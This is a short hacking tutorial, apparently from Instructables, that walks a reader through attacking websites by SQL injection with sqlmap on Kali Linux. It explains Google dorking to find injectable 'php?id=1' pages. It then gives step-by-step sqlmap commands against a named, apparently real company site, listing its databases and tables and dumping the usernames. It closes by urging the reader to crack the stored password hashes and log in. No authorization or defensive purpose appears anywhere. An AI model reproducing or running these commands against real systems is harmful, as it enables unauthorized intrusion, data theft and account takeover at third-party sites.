Step 1: Fire Up Kali Linux
I guess you know how to do this step :D
Step 2: Start a New Terminal
Step 3: Find a Vulnerable Website
Go to Google and search for: php?id=1. If you found a site that got that in their link put an ' after the 1. If it says that there's a problem with the sql syntax then the site is vulnerable.
Step 4: Using Sqlmap to Hack It
In your terminal type:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 --dbs
(http://www.angelvestgroup.com/info.php?id=1 is my vulnerable url)
Now it's going to load the databases...
If that's done you'll need to select a database by typing:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china --tables
(angelvest_china is the database I found)
Now it's going to load all the information that's in the database you've selected.
Now you'll need to select a table by typing:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user --column
(db_user is the table I found)
Now you need to select a column by typing:
sqlmap -u http://www.angelvestgroup.com/info.php?id=1 -D angelvest_china -T db_user -C username --dump
(username is the name of the column that I found)
Now it will dump the information in the column username and: you've hacked it! (On that site there is a column called passwords too so you just need to decrypt the hashes in that column and boom! You can login.)
Congrats! You've just hacked a website with sqlmap! If you liked the instructable you should take a look at my other instructables too! Stay tuned for more!